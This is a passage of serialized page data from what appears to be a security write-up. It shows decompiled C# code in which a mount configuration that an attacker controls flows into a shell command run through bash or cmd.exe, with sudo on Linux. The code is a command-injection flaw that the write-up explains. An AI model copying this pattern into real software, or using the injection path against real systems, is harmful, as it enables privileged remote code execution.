MountState",[1373,16411,59],{"class":1383},[1373,16413,16414],{"class":4640},"Mounted",[1373,16416,11875],{"class":1383},[1373,16418,16419],{"class":1375,"line":4768},[1373,16420,9788],{"class":1383},[1373,16422,16423,16426,16428,16431,16433,16436],{"class":1375,"line":4792},[1373,16424,16425],{"class":4640},"            successResult ",[1373,16427,5417],{"class":1397},[1373,16429,16430],{"class":4640}," 
SuccessResult",[1373,16432,59],{"class":1383},[1373,16434,16435],{"class":4640},"SuccessPacket",[1373,16437,4912],{"class":1383},[1373,16439,16440],{"class":1375,"line":4798},[1373,16441,9861],{"class":1383},[1373,16443,16444],{"class":1375,"line":4806},[1373,16445,9866],{"class":4636},[1373,16447,16448],{"class":1375,"line":4817},[1373,16449,9788],{"class":1383},[1373,16451,16452,16455,16457,16460,16462,16464,16466,16468,16470,16472,16474],{"class":1375,"line":4825},[1373,16453,16454],{"class":4640},"            MountConfiguration",[1373,16456,59],{"class":1383},[1373,16458,16459],{"class":4640},"MountInfo",[1373,16461,7035],{"class":1383},[1373,16463,16339],{"class":4640},[1373,16465,59],{"class":1383},[1373,16467,15218],{"class":4640},[1373,16469,15050],{"class":1383},[1373,16471,8575],{"class":1397},[1373,16473,16298],{"class":4640},[1373,16475,4912],{"class":1383},[1373,16477,16478,16480,16482,16484,16486,16488,16490,16492,16494,16496,16499,16502,16505,16507,16510],{"class":1375,"line":4835},[1373,16479,9793],{"class":4636},[1373,16481,4641],{"class":1383},[1373,16483,16388],{"class":4640},[1373,16485,59],{"class":1383},[1373,16487,16459],{"class":4640},[1373,16489,7035],{"class":1383},[1373,16491,16339],{"class":4640},[1373,16493,59],{"class":1383},[1373,16495,15218],{"class":4640},[1373,16497,16498],{"class":1383},"].",[1373,16500,16501],{"class":4640},"ReadOnly ",[1373,16503,16504],{"class":1397},"&&",[1373,16506,7370],{"class":1397},[1373,16508,16509],{"class":4640},"isSystemMount",[1373,16511,11875],{"class":1383},[1373,16513,16514],{"class":1375,"line":4843},[1373,16515,9814],{"class":1383},[1373,16517,16518,16521,16524,16526,16528,16531,16533,16535,16538,16540,16542,16544,16546,16549,16551,16553,16556,16558],{"class":1375,"line":4849},[1373,16519,16520],{"class":14938},"                Exception",[1373,16522,16523],{"class":9372}," ex",[1373,16525,8575],{"class":1397},[1373,16527,15283],{"class":1397},[1373,16529,16530],{"class":14938}," 
Exception",[1373,16532,1384],{"class":1383},[1373,16534,183],{"class":1387},[1373,16536,16537],{"class":1391},"Mount failed: ",[1373,16539,183],{"class":1387},[1373,16541,15478],{"class":1397},[1373,16543,16298],{"class":4640},[1373,16545,59],{"class":1383},[1373,16547,16548],{"class":4640},"MountPath ",[1373,16550,15448],{"class":1397},[1373,16552,4883],{"class":1387},[1373,16554,16555],{"class":1391}," controlled by Hub",[1373,16557,183],{"class":1387},[1373,16559,4680],{"class":1383},[1373,16561,16562,16565,16567,16570,16572,16575,16577,16580],{"class":1375,"line":4877},[1373,16563,16564],{"class":4640},"                MountConfiguration",[1373,16566,59],{"class":1383},[1373,16568,16569],{"class":7297},"LogException",[1373,16571,1384],{"class":1383},[1373,16573,16574],{"class":4640},"ex",[1373,16576,5437],{"class":1383},[1373,16578,16579],{"class":1387}," \"\"",[1373,16581,4680],{"class":1383},[1373,16583,16584,16587,16589],{"class":1375,"line":4915},[1373,16585,16586],{"class":4636},"                throw",[1373,16588,16523],{"class":4640},[1373,16590,4912],{"class":1383},[1373,16592,16593],{"class":1375,"line":4931},[1373,16594,9832],{"class":1383},[1373,16596,16597,16599,16601,16603,16605,16607,16610,16612,16614,16616,16618,16620,16623,16625,16627,16630,16632,16634,16636,16638],{"class":1375,"line":4947},[1373,16598,9793],{"class":4636},[1373,16600,4641],{"class":1383},[1373,16602,16090],{"class":1397},[1373,16604,15752],{"class":1397},[1373,16606,59],{"class":1383},[1373,16608,16609],{"class":7297},"IsNullOrWhiteSpace",[1373,16611,1384],{"class":1383},[1373,16613,16339],{"class":4640},[1373,16615,59],{"class":1383},[1373,16617,14894],{"class":4640},[1373,16619,2230],{"class":1383},[1373,16621,16622],{"class":1397}," &&",[1373,16624,16298],{"class":4640},[1373,16626,59],{"class":1383},[1373,16628,16629],{"class":4640},"CommandMount 
",[1373,16631,15677],{"class":1397},[1373,16633,4883],{"class":1387},[1373,16635,7055],{"class":1391},[1373,16637,183],{"class":1387},[1373,16639,11875],{"class":1383},[1373,16641,16642],{"class":1375,"line":4952},[1373,16643,9814],{"class":1383},[1373,16645,16646,16649,16651,16653,16656,16658,16660,16662,16664,16666,16668,16670,16672,16674,16676,16678,16681],{"class":1375,"line":6776},[1373,16647,16648],{"class":1397},"                await",[1373,16650,16118],{"class":4640},[1373,16652,59],{"class":1383},[1373,16654,16655],{"class":7297},"RunCommand",[1373,16657,1384],{"class":1383},[1373,16659,16339],{"class":4640},[1373,16661,59],{"class":1383},[1373,16663,15218],{"class":4640},[1373,16665,5437],{"class":1383},[1373,16667,16298],{"class":4640},[1373,16669,59],{"class":1383},[1373,16671,14894],{"class":4640},[1373,16673,5437],{"class":1383},[1373,16675,16298],{"class":4640},[1373,16677,59],{"class":1383},[1373,16679,16680],{"class":4640},"UseArgumentsInCommand",[1373,16682,4680],{"class":1383},[1373,16684,16685],{"class":1375,"line":6781},[1373,16686,9832],{"class":1383},[18,16688,16689,16690,16693],{},"This, in turn, calls ",[886,16691,16692],{},"CommandLine.RunCommand"," with the attacker-controlled mount configuration:",[1354,16695,16697],{"className":14927,"code":16696,"language":14929,"meta":219,"style":219},"private static async Task RunCommand(string path, string command, bool includeArgs)\n{\n    if (!string.IsNullOrWhiteSpace(command))\n    {\n        MountConfiguration.LogDetail(\"Run command path: \" + path);\n        if (includeArgs)\n        {\n            HANodeConfig currentNodeConfig = HAClusterConfig.Instance.CurrentNodeConfig;\n            string text = ((currentNodeConfig != null) ? currentNodeConfig.GetUserData\u003CHANodeConfig>().Get\u003Cstring>(HANodeConfig.PreviousRunningNode) : null) ?? \"\";\n            if (string.IsNullOrWhiteSpace(text))\n            {\n                text = ((currentNodeConfig != null) ? 
currentNodeConfig.PrimaryServer : null);\n            }\n            string text2 = HAClusterConfig.Instance.LocalName;\n            if (string.IsNullOrWhiteSpace(text2))\n            {\n                text2 = Environment.MachineName;\n            }\n            string text3 = ((currentNodeConfig != null) ? currentNodeConfig.PrimaryServer : null);\n            if (string.IsNullOrWhiteSpace(text3))\n            {\n                text3 = \"local\";\n            }\n            if (path.Contains(' '))\n            {\n                path = \"\\\"\" + path + \"\\\"\";\n            }\n            DefaultInterpolatedStringHandler defaultInterpolatedStringHandler = new DefaultInterpolatedStringHandler(4, 5);\n            defaultInterpolatedStringHandler.AppendFormatted(command);\n            defaultInterpolatedStringHandler.AppendLiteral(\" \");\n            defaultInterpolatedStringHandler.AppendFormatted(text2);\n            defaultInterpolatedStringHandler.AppendLiteral(\" \");\n            defaultInterpolatedStringHandler.AppendFormatted(text3);\n            defaultInterpolatedStringHandler.AppendLiteral(\" \");\n            defaultInterpolatedStringHandler.AppendFormatted(text);\n            defaultInterpolatedStringHandler.AppendLiteral(\" \");\n            defaultInterpolatedStringHandler.AppendFormatted(path);\n            command = defaultInterpolatedStringHandler.ToStringAndClear();\n            MountConfiguration.LogDetail(\"Run command (with args): \" + command);\n        }\n        else\n        {\n            MountConfiguration.LogDetail(\"Run command: \" + command);\n        }\n        ValueTuple\u003Cstring, bool, string> valueTuple = await CommandLine.RunCommand(FileManager.ApplicationDataPath, command, false, new Action\u003Cstring>(MountConfiguration.\u003CRunCommand>g__ProcessCommandOutput|23_0));\n        ValueTuple\u003Cstring, bool, string> valueTuple2 = valueTuple;\n        if (!valueTuple2.Item2)\n        {\n            throw new 
Exception(\"Process exited with error Mount: \" + path + \", \\n \" + valueTuple2.Item1);\n        }\n    }\n}\n",[886,16698,16699,16736,16740,16762,16766,16791,16802,16806,16829,16899,16917,16921,16953,16957,16977,16996,17000,17017,17021,17053,17071,17075,17091,17095,17116,17120,17149,17153,17179,17195,17212,17226,17242,17256,17272,17286,17302,17316,17332,17355,17359,17363,17367,17390,17394,17478,17505,17523,17527,17570,17574,17578],{"__ignoreMap":219},[1373,16700,16701,16704,16706,16708,16710,16713,16715,16717,16720,16722,16724,16727,16729,16731,16734],{"class":1375,"line":1376},[1373,16702,16703],{"class":4652},"private",[1373,16705,15232],{"class":4652},[1373,16707,15022],{"class":4652},[1373,16709,15025],{"class":14938},[1373,16711,16712],{"class":7297}," RunCommand",[1373,16714,1384],{"class":1383},[1373,16716,15752],{"class":1397},[1373,16718,16719],{"class":9372}," path",[1373,16721,5437],{"class":1383},[1373,16723,15757],{"class":1397},[1373,16725,16726],{"class":9372}," command",[1373,16728,5437],{"class":1383},[1373,16730,16303],{"class":1397},[1373,16732,16733],{"class":9372}," includeArgs",[1373,16735,11875],{"class":1383},[1373,16737,16738],{"class":1375,"line":220},[1373,16739,8904],{"class":1383},[1373,16741,16742,16744,16746,16748,16750,16752,16754,16756,16759],{"class":1375,"line":1266},[1373,16743,4695],{"class":4636},[1373,16745,4641],{"class":1383},[1373,16747,16090],{"class":1397},[1373,16749,15752],{"class":1397},[1373,16751,59],{"class":1383},[1373,16753,16609],{"class":7297},[1373,16755,1384],{"class":1383},[1373,16757,16758],{"class":4640},"command",[1373,16760,16761],{"class":1383},"))\n",[1373,16763,16764],{"class":1375,"line":1852},[1373,16765,9613],{"class":1383},[1373,16767,16768,16771,16773,16776,16778,16780,16783,16785,16787,16789],{"class":1375,"line":4692},[1373,16769,16770],{"class":4640},"        
MountConfiguration",[1373,16772,59],{"class":1383},[1373,16774,16775],{"class":7297},"LogDetail",[1373,16777,1384],{"class":1383},[1373,16779,183],{"class":1387},[1373,16781,16782],{"class":1391},"Run command path: ",[1373,16784,183],{"class":1387},[1373,16786,15478],{"class":1397},[1373,16788,16719],{"class":4640},[1373,16790,4680],{"class":1383},[1373,16792,16793,16795,16797,16800],{"class":1375,"line":4724},[1373,16794,9773],{"class":4636},[1373,16796,4641],{"class":1383},[1373,16798,16799],{"class":4640},"includeArgs",[1373,16801,11875],{"class":1383},[1373,16803,16804],{"class":1375,"line":4756},[1373,16805,9788],{"class":1383},[1373,16807,16808,16811,16814,16816,16818,16820,16822,16824,16827],{"class":1375,"line":4768},[1373,16809,16810],{"class":14938},"            HANodeConfig",[1373,16812,16813],{"class":9372}," currentNodeConfig",[1373,16815,8575],{"class":1397},[1373,16817,15159],{"class":4640},[1373,16819,59],{"class":1383},[1373,16821,15164],{"class":4640},[1373,16823,59],{"class":1383},[1373,16825,16826],{"class":4640},"CurrentNodeConfig",[1373,16828,4912],{"class":1383},[1373,16830,16831,16833,16835,16837,16840,16843,16845,16847,16849,16852,16854,16856,16859,16861,16864,16867,16870,16872,16874,16876,16878,16880,16883,16885,16888,16890,16892,16895,16897],{"class":1375,"line":4792},[1373,16832,15381],{"class":1397},[1373,16834,15384],{"class":9372},[1373,16836,8575],{"class":1397},[1373,16838,16839],{"class":1383}," ((",[1373,16841,16842],{"class":4640},"currentNodeConfig ",[1373,16844,15677],{"class":1397},[1373,16846,15680],{"class":7054},[1373,16848,2230],{"class":1383},[1373,16850,16851],{"class":1397}," 
?",[1373,16853,16813],{"class":4640},[1373,16855,59],{"class":1383},[1373,16857,16858],{"class":7297},"GetUserData",[1373,16860,11852],{"class":1383},[1373,16862,16863],{"class":14938},"HANodeConfig",[1373,16865,16866],{"class":1383},">().",[1373,16868,16869],{"class":7297},"Get",[1373,16871,11852],{"class":1383},[1373,16873,15752],{"class":1397},[1373,16875,15660],{"class":1383},[1373,16877,16863],{"class":4640},[1373,16879,59],{"class":1383},[1373,16881,16882],{"class":4640},"PreviousRunningNode",[1373,16884,2230],{"class":1383},[1373,16886,16887],{"class":1397}," :",[1373,16889,15680],{"class":7054},[1373,16891,2230],{"class":1383},[1373,16893,16894],{"class":1397}," ??",[1373,16896,16579],{"class":1387},[1373,16898,4912],{"class":1383},[1373,16900,16901,16903,16905,16907,16909,16911,16913,16915],{"class":1375,"line":4798},[1373,16902,9793],{"class":4636},[1373,16904,4641],{"class":1383},[1373,16906,15752],{"class":1397},[1373,16908,59],{"class":1383},[1373,16910,16609],{"class":7297},[1373,16912,1384],{"class":1383},[1373,16914,1359],{"class":4640},[1373,16916,16761],{"class":1383},[1373,16918,16919],{"class":1375,"line":4806},[1373,16920,9814],{"class":1383},[1373,16922,16923,16926,16928,16930,16932,16934,16936,16938,16940,16942,16944,16947,16949,16951],{"class":1375,"line":4817},[1373,16924,16925],{"class":4640},"                text ",[1373,16927,5417],{"class":1397},[1373,16929,16839],{"class":1383},[1373,16931,16842],{"class":4640},[1373,16933,15677],{"class":1397},[1373,16935,15680],{"class":7054},[1373,16937,2230],{"class":1383},[1373,16939,16851],{"class":1397},[1373,16941,16813],{"class":4640},[1373,16943,59],{"class":1383},[1373,16945,16946],{"class":4640},"PrimaryServer 
",[1373,16948,4606],{"class":1397},[1373,16950,15680],{"class":7054},[1373,16952,4680],{"class":1383},[1373,16954,16955],{"class":1375,"line":4825},[1373,16956,9832],{"class":1383},[1373,16958,16959,16961,16963,16965,16967,16969,16971,16973,16975],{"class":1375,"line":4835},[1373,16960,15381],{"class":1397},[1373,16962,15410],{"class":9372},[1373,16964,8575],{"class":1397},[1373,16966,15159],{"class":4640},[1373,16968,59],{"class":1383},[1373,16970,15164],{"class":4640},[1373,16972,59],{"class":1383},[1373,16974,15169],{"class":4640},[1373,16976,4912],{"class":1383},[1373,16978,16979,16981,16983,16985,16987,16989,16991,16994],{"class":1375,"line":4843},[1373,16980,9793],{"class":4636},[1373,16982,4641],{"class":1383},[1373,16984,15752],{"class":1397},[1373,16986,59],{"class":1383},[1373,16988,16609],{"class":7297},[1373,16990,1384],{"class":1383},[1373,16992,16993],{"class":4640},"text2",[1373,16995,16761],{"class":1383},[1373,16997,16998],{"class":1375,"line":4849},[1373,16999,9814],{"class":1383},[1373,17001,17002,17005,17007,17010,17012,17015],{"class":1375,"line":4877},[1373,17003,17004],{"class":4640},"                text2 ",[1373,17006,5417],{"class":1397},[1373,17008,17009],{"class":4640}," 
Environment",[1373,17011,59],{"class":1383},[1373,17013,17014],{"class":4640},"MachineName",[1373,17016,4912],{"class":1383},[1373,17018,17019],{"class":1375,"line":4915},[1373,17020,9832],{"class":1383},[1373,17022,17023,17025,17027,17029,17031,17033,17035,17037,17039,17041,17043,17045,17047,17049,17051],{"class":1375,"line":4931},[1373,17024,15381],{"class":1397},[1373,17026,15440],{"class":9372},[1373,17028,8575],{"class":1397},[1373,17030,16839],{"class":1383},[1373,17032,16842],{"class":4640},[1373,17034,15677],{"class":1397},[1373,17036,15680],{"class":7054},[1373,17038,2230],{"class":1383},[1373,17040,16851],{"class":1397},[1373,17042,16813],{"class":4640},[1373,17044,59],{"class":1383},[1373,17046,16946],{"class":4640},[1373,17048,4606],{"class":1397},[1373,17050,15680],{"class":7054},[1373,17052,4680],{"class":1383},[1373,17054,17055,17057,17059,17061,17063,17065,17067,17069],{"class":1375,"line":4947},[1373,17056,9793],{"class":4636},[1373,17058,4641],{"class":1383},[1373,17060,15752],{"class":1397},[1373,17062,59],{"class":1383},[1373,17064,16609],{"class":7297},[1373,17066,1384],{"class":1383},[1373,17068,15531],{"class":4640},[1373,17070,16761],{"class":1383},[1373,17072,17073],{"class":1375,"line":4952},[1373,17074,9814],{"class":1383},[1373,17076,17077,17080,17082,17084,17087,17089],{"class":1375,"line":6776},[1373,17078,17079],{"class":4640},"                text3 
",[1373,17081,5417],{"class":1397},[1373,17083,4883],{"class":1387},[1373,17085,17086],{"class":1391},"local",[1373,17088,183],{"class":1387},[1373,17090,4912],{"class":1383},[1373,17092,17093],{"class":1375,"line":6781},[1373,17094,9832],{"class":1383},[1373,17096,17097,17099,17101,17103,17105,17108,17110,17112,17114],{"class":1375,"line":7524},[1373,17098,9793],{"class":4636},[1373,17100,4641],{"class":1383},[1373,17102,7590],{"class":4640},[1373,17104,59],{"class":1383},[1373,17106,17107],{"class":7297},"Contains",[1373,17109,1384],{"class":1383},[1373,17111,1388],{"class":1387},[1373,17113,4713],{"class":1387},[1373,17115,16761],{"class":1383},[1373,17117,17118],{"class":1375,"line":7530},[1373,17119,9814],{"class":1383},[1373,17121,17122,17125,17127,17129,17132,17134,17136,17139,17141,17143,17145,17147],{"class":1375,"line":7546},[1373,17123,17124],{"class":4640},"                path ",[1373,17126,5417],{"class":1397},[1373,17128,4883],{"class":1387},[1373,17130,17131],{"class":2326},"\\\"",[1373,17133,183],{"class":1387},[1373,17135,15478],{"class":1397},[1373,17137,17138],{"class":4640}," path ",[1373,17140,15448],{"class":1397},[1373,17142,4883],{"class":1387},[1373,17144,17131],{"class":2326},[1373,17146,183],{"class":1387},[1373,17148,4912],{"class":1383},[1373,17150,17151],{"class":1375,"line":7571},[1373,17152,9832],{"class":1383},[1373,17154,17155,17158,17161,17163,17165,17168,17170,17172,17174,17177],{"class":1375,"line":7598},[1373,17156,17157],{"class":14938},"            DefaultInterpolatedStringHandler",[1373,17159,17160],{"class":9372}," defaultInterpolatedStringHandler",[1373,17162,8575],{"class":1397},[1373,17164,15283],{"class":1397},[1373,17166,17167],{"class":14938}," DefaultInterpolatedStringHandler",[1373,17169,1384],{"class":1383},[1373,17171,380],{"class":5467},[1373,17173,5437],{"class":1383},[1373,17175,17176],{"class":5467}," 
5",[1373,17178,4680],{"class":1383},[1373,17180,17181,17184,17186,17189,17191,17193],{"class":1375,"line":7615},[1373,17182,17183],{"class":4640},"            defaultInterpolatedStringHandler",[1373,17185,59],{"class":1383},[1373,17187,17188],{"class":7297},"AppendFormatted",[1373,17190,1384],{"class":1383},[1373,17192,16758],{"class":4640},[1373,17194,4680],{"class":1383},[1373,17196,17197,17199,17201,17204,17206,17208,17210],{"class":1375,"line":7635},[1373,17198,17183],{"class":4640},[1373,17200,59],{"class":1383},[1373,17202,17203],{"class":7297},"AppendLiteral",[1373,17205,1384],{"class":1383},[1373,17207,183],{"class":1387},[1373,17209,4883],{"class":1387},[1373,17211,4680],{"class":1383},[1373,17213,17214,17216,17218,17220,17222,17224],{"class":1375,"line":7640},[1373,17215,17183],{"class":4640},[1373,17217,59],{"class":1383},[1373,17219,17188],{"class":7297},[1373,17221,1384],{"class":1383},[1373,17223,16993],{"class":4640},[1373,17225,4680],{"class":1383},[1373,17227,17228,17230,17232,17234,17236,17238,17240],{"class":1375,"line":7648},[1373,17229,17183],{"class":4640},[1373,17231,59],{"class":1383},[1373,17233,17203],{"class":7297},[1373,17235,1384],{"class":1383},[1373,17237,183],{"class":1387},[1373,17239,4883],{"class":1387},[1373,17241,4680],{"class":1383},[1373,17243,17244,17246,17248,17250,17252,17254],{"class":1375,"line":7672},[1373,17245,17183],{"class":4640},[1373,17247,59],{"class":1383},[1373,17249,17188],{"class":7297},[1373,17251,1384],{"class":1383},[1373,17253,15531],{"class":4640},[1373,17255,4680],{"class":1383},[1373,17257,17258,17260,17262,17264,17266,17268,17270],{"class":1375,"line":7688},[1373,17259,17183],{"class":4640},[1373,17261,59],{"class":1383},[1373,17263,17203],{"class":7297},[1373,17265,1384],{"class":1383},[1373,17267,183],{"class":1387},[1373,17269,4883],{"class":1387},[1373,17271,4680],{"class":1383},[1373,17273,17274,17276,17278,17280,17282,17284],{"class":1375,"line":7709},[1373,17275,17183],{"class":4640},[1373,17277,
59],{"class":1383},[1373,17279,17188],{"class":7297},[1373,17281,1384],{"class":1383},[1373,17283,1359],{"class":4640},[1373,17285,4680],{"class":1383},[1373,17287,17288,17290,17292,17294,17296,17298,17300],{"class":1375,"line":7714},[1373,17289,17183],{"class":4640},[1373,17291,59],{"class":1383},[1373,17293,17203],{"class":7297},[1373,17295,1384],{"class":1383},[1373,17297,183],{"class":1387},[1373,17299,4883],{"class":1387},[1373,17301,4680],{"class":1383},[1373,17303,17304,17306,17308,17310,17312,17314],{"class":1375,"line":7722},[1373,17305,17183],{"class":4640},[1373,17307,59],{"class":1383},[1373,17309,17188],{"class":7297},[1373,17311,1384],{"class":1383},[1373,17313,7590],{"class":4640},[1373,17315,4680],{"class":1383},[1373,17317,17318,17321,17323,17325,17327,17330],{"class":1375,"line":9903},[1373,17319,17320],{"class":4640},"            command ",[1373,17322,5417],{"class":1397},[1373,17324,17160],{"class":4640},[1373,17326,59],{"class":1383},[1373,17328,17329],{"class":7297},"ToStringAndClear",[1373,17331,15603],{"class":1383},[1373,17333,17334,17336,17338,17340,17342,17344,17347,17349,17351,17353],{"class":1375,"line":9908},[1373,17335,16454],{"class":4640},[1373,17337,59],{"class":1383},[1373,17339,16775],{"class":7297},[1373,17341,1384],{"class":1383},[1373,17343,183],{"class":1387},[1373,17345,17346],{"class":1391},"Run command (with args): 
",[1373,17348,183],{"class":1387},[1373,17350,15478],{"class":1397},[1373,17352,16726],{"class":4640},[1373,17354,4680],{"class":1383},[1373,17356,17357],{"class":1375,"line":9913},[1373,17358,9861],{"class":1383},[1373,17360,17361],{"class":1375,"line":9932},[1373,17362,9866],{"class":4636},[1373,17364,17365],{"class":1375,"line":9937},[1373,17366,9788],{"class":1383},[1373,17368,17369,17371,17373,17375,17377,17379,17382,17384,17386,17388],{"class":1375,"line":9957},[1373,17370,16454],{"class":4640},[1373,17372,59],{"class":1383},[1373,17374,16775],{"class":7297},[1373,17376,1384],{"class":1383},[1373,17378,183],{"class":1387},[1373,17380,17381],{"class":1391},"Run command: ",[1373,17383,183],{"class":1387},[1373,17385,15478],{"class":1397},[1373,17387,16726],{"class":4640},[1373,17389,4680],{"class":1383},[1373,17391,17392],{"class":1375,"line":9962},[1373,17393,9861],{"class":1383},[1373,17395,17396,17399,17401,17403,17405,17407,17409,17411,17413,17416,17418,17420,17423,17425,17427,17429,17432,17434,17437,17439,17441,17443,17445,17447,17449,17452,17454,17456,17458,17461,17463,17465,17467,17470,17473,17476],{"class":1375,"line":15955},[1373,17397,17398],{"class":14938},"        ValueTuple",[1373,17400,11852],{"class":1383},[1373,17402,15752],{"class":1397},[1373,17404,5437],{"class":1383},[1373,17406,16303],{"class":1397},[1373,17408,5437],{"class":1383},[1373,17410,15757],{"class":1397},[1373,17412,5384],{"class":1383},[1373,17414,17415],{"class":9372}," valueTuple",[1373,17417,8575],{"class":1397},[1373,17419,15116],{"class":1397},[1373,17421,17422],{"class":4640}," 
CommandLine",[1373,17424,59],{"class":1383},[1373,17426,16655],{"class":7297},[1373,17428,1384],{"class":1383},[1373,17430,17431],{"class":4640},"FileManager",[1373,17433,59],{"class":1383},[1373,17435,17436],{"class":4640},"ApplicationDataPath",[1373,17438,5437],{"class":1383},[1373,17440,16726],{"class":4640},[1373,17442,5437],{"class":1383},[1373,17444,16311],{"class":14985},[1373,17446,5437],{"class":1383},[1373,17448,15283],{"class":1397},[1373,17450,17451],{"class":14938}," Action",[1373,17453,11852],{"class":1383},[1373,17455,15752],{"class":1397},[1373,17457,15660],{"class":1383},[1373,17459,17460],{"class":4640},"MountConfiguration.",[1373,17462,11852],{"class":1397},[1373,17464,16655],{"class":4640},[1373,17466,5384],{"class":1397},[1373,17468,17469],{"class":4640},"g__ProcessCommandOutput",[1373,17471,17472],{"class":1397},"|",[1373,17474,17475],{"class":5467},"23_0",[1373,17477,1413],{"class":1383},[1373,17479,17480,17482,17484,17486,17488,17490,17492,17494,17496,17499,17501,17503],{"class":1375,"line":16030},[1373,17481,17398],{"class":14938},[1373,17483,11852],{"class":1383},[1373,17485,15752],{"class":1397},[1373,17487,5437],{"class":1383},[1373,17489,16303],{"class":1397},[1373,17491,5437],{"class":1383},[1373,17493,15757],{"class":1397},[1373,17495,5384],{"class":1383},[1373,17497,17498],{"class":9372}," 
valueTuple2",[1373,17500,8575],{"class":1397},[1373,17502,17415],{"class":4640},[1373,17504,4912],{"class":1383},[1373,17506,17507,17509,17511,17513,17516,17518,17521],{"class":1375,"line":16035},[1373,17508,9773],{"class":4636},[1373,17510,4641],{"class":1383},[1373,17512,16090],{"class":1397},[1373,17514,17515],{"class":4640},"valueTuple2",[1373,17517,59],{"class":1383},[1373,17519,17520],{"class":4640},"Item2",[1373,17522,11875],{"class":1383},[1373,17524,17525],{"class":1375,"line":16083},[1373,17526,9788],{"class":1383},[1373,17528,17529,17532,17534,17536,17538,17540,17543,17545,17547,17549,17551,17553,17555,17557,17559,17561,17563,17565,17568],{"class":1375,"line":16098},[1373,17530,17531],{"class":4636},"            throw",[1373,17533,15283],{"class":1397},[1373,17535,16530],{"class":14938},[1373,17537,1384],{"class":1383},[1373,17539,183],{"class":1387},[1373,17541,17542],{"class":1391},"Process exited with error Mount: ",[1373,17544,183],{"class":1387},[1373,17546,15478],{"class":1397},[1373,17548,17138],{"class":4640},[1373,17550,15448],{"class":1397},[1373,17552,4883],{"class":1387},[1373,17554,1246],{"class":1391},[1373,17556,8943],{"class":2326},[1373,17558,4883],{"class":1387},[1373,17560,15478],{"class":1397},[1373,17562,17498],{"class":4640},[1373,17564,59],{"class":1383},[1373,17566,17567],{"class":4640},"Item1",[1373,17569,4680],{"class":1383},[1373,17571,17572],{"class":1375,"line":16103},[1373,17573,9861],{"class":1383},[1373,17575,17576],{"class":1375,"line":16147},[1373,17577,4795],{"class":1383},[1373,17579,17580],{"class":1375,"line":16153},[1373,17581,1855],{"class":1383},[18,17583,17584,17585,17587,17588,17591],{},"Finally, the attacker-controlled value hits the ",[886,17586,16655],{}," function; that function then calls ",[886,17589,17590],{},"Process"," with attacker-controlled values and will also escalate privileges on Linux 
platforms:",[1354,17593,17595],{"className":14927,"code":17594,"language":14929,"meta":219,"style":219},"[NullableContext(1)]\n[return: TupleElementNames(new string[] { \"result\", \"success\", \"cmd\" })]\n[return: Nullable(new byte[] { 1, 0, 1, 1 })]\npublic static async Task\u003CValueTuple\u003Cstring, bool, string>> RunCommand(string currentDir, string command, bool sudo = false, Action\u003Cstring> processOutputLine = null)\n{\n    string ranCmd = string.Empty;\n    if (string.IsNullOrWhiteSpace(currentDir))\n    {\n        currentDir = AppDomain.CurrentDomain.BaseDirectory;\n    }\n    if (CommandLine.IsDocker)\n    {\n        sudo = false;\n    }\n    ProcessStartInfo processStartInfo = new ProcessStartInfo\n    {\n        FileName = (OperatingSystem.IsWindows() ? \"cmd.exe\" : \"\u002Fbin\u002Fbash\"),\n        Arguments = (OperatingSystem.IsWindows() ? (\"\u002Fc \" + command) : (\"-c \\\"\" + (sudo ? \"sudo \" : \"\") + command + \"\\\"\")),\n        RedirectStandardOutput = true,\n        RedirectStandardError = true,\n        UseShellExecute = false,\n        CreateNoWindow = true,\n        WorkingDirectory = currentDir\n    };\n    ranCmd = processStartInfo.FileName + \" \" + processStartInfo.Arguments;\n    StringBuilder resultSb = new StringBuilder();\n    bool flag = false;\n    using (Process process = new Process\n    {\n        StartInfo = processStartInfo\n    })\n    {\n        process.OutputDataReceived += delegate(object sender, DataReceivedEventArgs args)\n        {\n            if (!string.IsNullOrEmpty(args.Data))\n            {\n                resultSb.AppendLine(args.Data);\n                Action\u003Cstring> processOutputLine5 = processOutputLine;\n                if (processOutputLine5 == null)\n                {\n                    return;\n                }\n                processOutputLine5(args.Data);\n            }\n        };\n        process.ErrorDataReceived += delegate(object sender, DataReceivedEventArgs args)\n        
{\n            if (!string.IsNullOrEmpty(args.Data))\n            {\n                resultSb.AppendLine(args.Data);\n                Action\u003Cstring> processOutputLine6 = processOutputLine;\n                if (processOutputLine6 == null)\n                {\n                    return;\n                }\n                processOutputLine6(args.Data);\n            }\n        };\n        try\n        {\n            process.Start();\n            process.BeginOutputReadLine();\n            process.BeginErrorReadLine();\n            Action\u003Cstring> processOutputLine2 = processOutputLine;\n            if (processOutputLine2 != null)\n            {\n                processOutputLine2(\"Waiting for process to exit.\");\n            }\n            await process.WaitForExitAsync(default(CancellationToken));\n            flag = process.ExitCode == 0;\n            DefaultInterpolatedStringHandler defaultInterpolatedStringHandler = new DefaultInterpolatedStringHandler(19, 1);\n            defaultInterpolatedStringHandler.AppendLiteral(\"Process exit code: \");\n            defaultInterpolatedStringHandler.AppendFormatted\u003Cint>(process.ExitCode);\n            string text = defaultInterpolatedStringHandler.ToStringAndClear();\n            Action\u003Cstring> processOutputLine3 = processOutputLine;\n            if (processOutputLine3 != null)\n            {\n                processOutputLine3(text);\n            }\n            text = \"Process Command: \" + ranCmd;\n            Action\u003Cstring> processOutputLine4 = processOutputLine;\n            if (processOutputLine4 != null)\n            {\n                processOutputLine4(text);\n            }\n        }\n        catch (Exception ex)\n        {\n            return new ValueTuple\u003Cstring, bool, string>(ex.ToString(), false, ranCmd);\n        }\n    }\n    Process process = null;\n    return new ValueTuple\u003Cstring, bool, string>(resultSb.ToString(), flag, 
ranCmd);\n}\n\n}\n",[886,17596,17597,17610,17659,17697,17771,17775,17792,17811,17815,17837,17841,17857,17861,17872,17876,17891,17895,17934,18018,18029,18040,18051,18062,18072,18077,18108,18125,18139,18157,18161,18171,18176,18180,18214,18218,18245,18249,18269,18289,18305,18309,18316,18321,18336,18340,18345,18372,18376,18400,18404,18422,18441,18456,18460,18466,18470,18485,18489,18493,18497,18502,18515,18527,18539,18560,18576,18581,18598,18603,18628,18649,18672,18692,18718,18735,18755,18771,18776,18788,18793,18814,18834,18850,18855,18867,18872,18877,18892,18897,18938,18943,18948,18962,19002,19007,19012],{"__ignoreMap":219},[1373,17598,17599,17601,17604,17606,17608],{"class":1375,"line":1376},[1373,17600,7035],{"class":1383},[1373,17602,17603],{"class":14938},"NullableContext",[1373,17605,1384],{"class":1383},[1373,17607,467],{"class":5467},[1373,17609,14951],{"class":1383},[1373,17611,17612,17614,17617,17619,17622,17624,17626,17628,17630,17632,17634,17637,17639,17641,17643,17645,17647,17649,17651,17654,17656],{"class":1375,"line":220},[1373,17613,7035],{"class":1383},[